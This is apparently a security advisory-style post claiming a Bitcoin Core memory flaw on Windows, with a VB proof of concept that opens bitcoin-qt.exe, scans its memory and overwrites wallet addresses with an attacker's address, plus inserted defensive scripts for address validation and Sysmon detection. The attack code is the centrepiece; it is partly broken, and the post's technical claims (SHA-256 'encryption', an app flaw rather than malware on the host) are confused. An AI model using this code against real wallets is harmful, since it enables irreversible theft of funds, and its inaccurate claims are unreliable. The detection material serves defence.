The Bitcoin app is vulnerable to hackers!

Description

Bitcoin Core (latest version, 22.0) suffers from a memory management issue that enables attackers to redirect funds to their own Bitcoin address.

DATE(S) ISSUED: 06/22/2023

RISK: Critical

Businesses (large and medium Bitcoin miners): HIGH

Home Users: LOW

Method: Remote thread execution

OVERVIEW:

The Bitcoin app on Windows currently has issues with memory management and memory protection. These vulnerabilities allow an attacker to modify the sending address stored in the app's memory, which redirects Bitcoin transactions to the attacker's own wallet.

Attacker's Method:

The Bitcoin app suffers from memory management issues that allow an attacker to open Bitcoin Core's process and search its memory for Bitcoin wallet addresses. While Bitcoin uses the SHA-256 hashing algorithm to encrypt the data stored in the blocks on the blockchain, the BTC addresses themselves are not encrypted in memory.

When a transaction occurs on the Bitcoin blockchain, it takes place through public addresses. These public addresses are held in the Bitcoin app's memory before the transaction is initiated.

An attacker can simply search for these BTC addresses, which are strings of 26-35 letters and numbers, locate every Bitcoin wallet address held in the Bitcoin app, and replace them with their own.

Once the public address has been replaced, Bitcoin transactions are redirected straight to the attacker's wallet. Due to the inherent nature of Bitcoin, this process is irreversible.
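As an added example (not code from the original post): a Base58Check decoder and validator for the legacy 26-35 character address format described above. It shows what such an address actually encodes (a version byte, a 20-byte hash and a 4-byte double-SHA256 checksum) and, from the defender's side, why neither a shape check nor the checksum can tell a legitimate destination from one that malware has substituted: any correctly encoded address passes both. The sample addresses are the public genesis-block address and one constructed from an arbitrary 20-byte value; the function names are my own.

```python
# Added example, not from the original post: decode/validate legacy Base58Check
# Bitcoin addresses and show that a substituted, well-formed address passes the
# same checks as the original. Sample inputs are constructed or public.
import hashlib
import re

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# Shape-only check, the counterpart of the "26-35 letters and numbers" rule above
# (Base58 omits 0, O, I and l).
ADDRESS_SHAPE = re.compile(r"^[1-9A-HJ-NP-Za-km-z]{26,35}$")


def b58decode(s: str) -> bytes:
    """Decode Base58 text to bytes; each leading '1' stands for a leading zero byte."""
    n = 0
    for ch in s:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            raise ValueError(f"invalid Base58 character {ch!r}")
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    pad = len(s) - len(s.lstrip("1"))
    return b"\x00" * pad + body


def b58encode(raw: bytes) -> str:
    """Encode bytes as Base58 text; each leading zero byte becomes a leading '1'."""
    n = int.from_bytes(raw, "big")
    out = ""
    while n:
        n, rem = divmod(n, 58)
        out = B58_ALPHABET[rem] + out
    pad = len(raw) - len(raw.lstrip(b"\x00"))
    return "1" * pad + out


def base58check_encode(version: int, payload: bytes) -> str:
    """version byte + payload + first 4 bytes of SHA256(SHA256(version + payload))."""
    data = bytes([version]) + payload
    checksum = hashlib.sha256(hashlib.sha256(data).digest()).digest()[:4]
    return b58encode(data + checksum)


def validate_legacy_address(addr: str) -> dict:
    """Return shape and checksum results plus the decoded version byte and hash160."""
    result = {"shape_ok": bool(ADDRESS_SHAPE.match(addr)), "checksum_ok": False,
              "version": None, "hash160": None}
    if not result["shape_ok"]:
        return result
    raw = b58decode(addr)
    if len(raw) != 25:  # 1 version byte + 20-byte hash + 4-byte checksum
        return result
    data, checksum = raw[:21], raw[21:]
    expected = hashlib.sha256(hashlib.sha256(data).digest()).digest()[:4]
    result["checksum_ok"] = checksum == expected
    if result["checksum_ok"]:
        result["version"] = data[0]
        result["hash160"] = data[1:].hex()
    return result


if __name__ == "__main__":
    genesis = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"  # public genesis-block address
    # Constructed hash160: an attacker-chosen value encodes into an address that
    # is just as "valid" as the real one.
    swapped = base58check_encode(0, bytes.fromhex("0123456789abcdef0123456789abcdef01234567"))
    for label, a in (("original", genesis), ("substituted", swapped)):
        print(label, a, validate_legacy_address(a))
```

Because format and checksum validation cannot detect substitution, the control that actually works is verifying the destination address out of band (for example on the screen of a hardware signing device) immediately before the transaction is signed.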

This method closely resembles the widely-known point-of-sale malware called Tinypos.

My research about Tinypos can be found here:

https://securitynews.sonicwall.com/xmlpost/tinypos-a-new-multi-component-pos-family-actively-spreading-in-the-wild/

To my understanding, we can expect to see an increase in the prevalence of Bitcoin point-of-sale (POS) malware in the near future!

The major difference between Tinypos and Bitcoin malware is that Bitcoin operates in a decentralized manner without a central authority. Therefore, if you become a victim of an attack, your funds will be permanently lost!

Video of Attack:

https://www.youtube.com/watch?v=oEl4M1oZim0

In this video, I used an app called Cheat Engine to demonstrate how hacking a Bitcoin wallet works. As you can see in the video, I created a Bitcoin sending address under my name. An attacker can easily gain access to the Bitcoin app's memory and replace it with another BTC wallet, causing all funds to be transferred to their own wallet during any transaction!


POC:

' PoC as posted (VB6/VBA); extraction had doubled every line break.
replace_hash = "bc1pkwjlvljdq6huzk85d8z695v26e93dd1m0upqumkncmx640dpdu4suyukmt"   ' attacker's hash

' Win32 API declarations
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hWnd As Long, lpdwProcessId As Long) As Long
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function VirtualQueryEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, lpBuffer As MEMORY_BASIC_INFORMATION, ByVal dwLength As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Private Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Private Const WM_GETTEXT As Long = &HD
Private Const WM_SETTEXT As Long = &HC
Private Const MEM_COMMIT As Long = &H1000
Private Const MEM_PRIVATE As Long = &H20000
Private Const PAGE_READWRITE As Long = &H4

Private Type MEMORY_BASIC_INFORMATION
    BaseAddress As Long
    AllocationBase As Long
    AllocationProtect As Long
    RegionSize As Long
    State As Long
    Protect As Long
    Type As Long
End Type

Private Sub Bitcoin_hack()
    Dim hWnd As Long
    Dim processId As Long
    Dim hProcess As Long
    Dim buffer As String
    Dim processName As String
    Dim searchString As String
    Dim replacementString As String

    processName = "bitcoin-qt.exe"
    searchString = "^[A-Za-z]{26,35}$" ' Pattern for strings with 26-35 letters Bitcoin address

    replacementString = replace_hash

    hWnd = FindWindow(vbNullString, processName)

    If hWnd <> 0 Then
        ' Get the process ID
        GetWindowThreadProcessId hWnd, processId

        ' Open the process
        hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, processId)

        If hProcess <> 0 Then
            Dim lpMemInfo As MEMORY_BASIC_INFORMATION
            Dim lpBuffer As String
            Dim lpAddress As Long
            Dim bytesRead As Long

            lpAddress = 0 ' Start at the beginning of the process memory

            ' Walk every memory region of the target process
            Do While VirtualQueryEx(hProcess, lpAddress, lpMemInfo, Len(lpMemInfo)) <> 0
                If (lpMemInfo.State = MEM_COMMIT) And (lpMemInfo.Type = MEM_PRIVATE) And (lpMemInfo.Protect = PAGE_READWRITE) Then
                    ' Allocate a buffer to read the memory
                    lpBuffer = Space(lpMemInfo.RegionSize)

                    ' Read the memory
                    ReadProcessMemory hProcess, ByVal lpMemInfo.BaseAddress, ByVal lpBuffer, lpMemInfo.RegionSize, bytesRead

                    ' Check if the buffer contains a matching string
                    If Len(lpBuffer) >= 26 And Len(lpBuffer) <= 35 And RegExpMatch(lpBuffer, searchString) Then
                        Dim writeBuffer As String
                        writeBuffer = RegExpReplace(lpBuffer, searchString, replacementString)

                        ' Write the modified text
                        WriteProcessMemory hProcess, ByVal lpMemInfo.BaseAddress, ByVal StrPtr(writeBuffer), Len(writeBuffer), 0
                    End If
                End If

                ' Move to the next memory region
                lpAddress = lpMemInfo.BaseAddress + lpMemInfo.RegionSize
            Loop

            ' Close the process handle
            CloseHandle hProcess
        Else
            MsgBox "Failed to open the process.", vbCritical
        End If
    Else
        MsgBox "The process could not be found.", vbCritical
    End If
End Sub

' Regex helpers built on the VBScript.RegExp COM object
Private Function RegExpMatch(ByVal text As String, ByVal pattern As String) As Boolean
    Dim regExp As Object
    Set regExp = CreateObject("VBScript.RegExp")

    With regExp
        .Global = True
        .IgnoreCase = True
        .Pattern = pattern
    End With

    RegExpMatch = regExp.Test(text)
End Function

Private Function RegExpReplace(ByVal text As String, ByVal pattern As String, ByVal replacement As String) As String
    Dim regExp As Object
    Set regExp = CreateObject("VBScript.RegExp")

    With regExp
        .Global = True
        .IgnoreCase = True
        .Pattern = pattern
    End With

    RegExpReplace = regExp.Replace(text, replacement)
End Function
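As an added example that is not part of the original post: the PoC above opens bitcoin-qt.exe with PROCESS_ALL_ACCESS and then calls ReadProcessMemory and WriteProcessMemory on it. On a Windows host running Sysmon, every such cross-process open is recorded as Event ID 10 (ProcessAccess) with the SourceImage, TargetImage and the GrantedAccess mask, so a detection can key on the wallet being the target and on the mask including the memory-write rights. The Python below runs that logic over constructed log lines written in a simplified key=value form (not real Sysmon output); the allow-list path and the helper names are assumptions of mine.

```python
# Added example, not from the original post: flag cross-process access to the
# wallet process of the kind the PoC performs. The log lines are CONSTRUCTED in a
# simplified key=value form that mirrors Sysmon Event ID 10 (ProcessAccess) field
# names; they are not real Sysmon output.
import re
from typing import List, Optional, Tuple

# Standard Win32 process access rights (winnt.h).
PROCESS_VM_OPERATION = 0x0008   # required by WriteProcessMemory
PROCESS_VM_READ = 0x0010        # required by ReadProcessMemory
PROCESS_VM_WRITE = 0x0020       # required by WriteProcessMemory
PROCESS_ALL_ACCESS = 0x1F0FFF   # the mask the PoC requests from OpenProcess

# Either of these rights lets the caller alter the target's memory.
WRITE_RIGHTS = PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Wallet executables whose memory other user processes have no business touching.
WALLET_IMAGES = ("bitcoin-qt.exe", "bitcoind.exe")

# Hypothetical allow-list of tooling that legitimately opens other processes
# (an EDR sensor, a backup agent); tune per environment.
ALLOWED_SOURCES = {r"c:\program files\exampleedr\sensor.exe"}

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> dict:
    """Turn one key=value log line into a dict; quoted values may contain spaces."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def classify(event: dict) -> Optional[str]:
    """Return 'high', 'medium' or None for one ProcessAccess event."""
    if event.get("EventID") != "10":
        return None
    target = event.get("TargetImage", "").lower()
    if not any(target.endswith("\\" + w) for w in WALLET_IMAGES):
        return None
    source = event.get("SourceImage", "").lower()
    if source in ALLOWED_SOURCES or source == target:
        return None
    granted = int(event.get("GrantedAccess", "0"), 16)
    if granted & WRITE_RIGHTS:
        return "high"      # source can rewrite wallet memory: the PoC's path
    if granted & PROCESS_VM_READ:
        return "medium"    # read-only scraping of the wallet's memory
    return None


def scan(lines) -> List[Tuple[str, str, str]]:
    """Return (severity, source image, target image) for every flagged line."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        sev = classify(ev)
        if sev:
            hits.append((sev, ev["SourceImage"], ev["TargetImage"]))
    return hits


# Constructed sample events (simplified key=value form).
SAMPLE_EVENTS = [
    r'EventID=10 SourceImage="C:\Users\alice\Downloads\update.exe" TargetImage="C:\Program Files\Bitcoin\bitcoin-qt.exe" GrantedAccess=0x1F0FFF',
    r'EventID=10 SourceImage="C:\Program Files\ExampleEDR\sensor.exe" TargetImage="C:\Program Files\Bitcoin\bitcoin-qt.exe" GrantedAccess=0x1010',
    r'EventID=10 SourceImage="C:\Windows\System32\Taskmgr.exe" TargetImage="C:\Program Files\Bitcoin\bitcoin-qt.exe" GrantedAccess=0x1000',
    r'EventID=10 SourceImage="C:\Tools\memscan.exe" TargetImage="C:\Program Files\Bitcoin\bitcoin-qt.exe" GrantedAccess=0x0010',
    r'EventID=10 SourceImage="C:\Users\alice\Downloads\update.exe" TargetImage="C:\Windows\System32\notepad.exe" GrantedAccess=0x1F0FFF',
]

if __name__ == "__main__":
    for sev, src, dst in scan(SAMPLE_EVENTS):
        print(f"[{sev}] {src} -> {dst}")
```

The first sample line reproduces the PoC's request (0x1F0FFF, which contains both VM write bits) and is rated high; a read-only open is rated medium; an open that asks only for query rights, an allow-listed sensor, or a non-wallet target produces nothing. Sysmon only records these events if its configuration includes a ProcessAccess rule for the wallet image, so that rule is a prerequisite for the detection.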

 

Summary:

Use Cold Wallets until they fix this!


Questions?

Nima_bagheri79@yahoo.com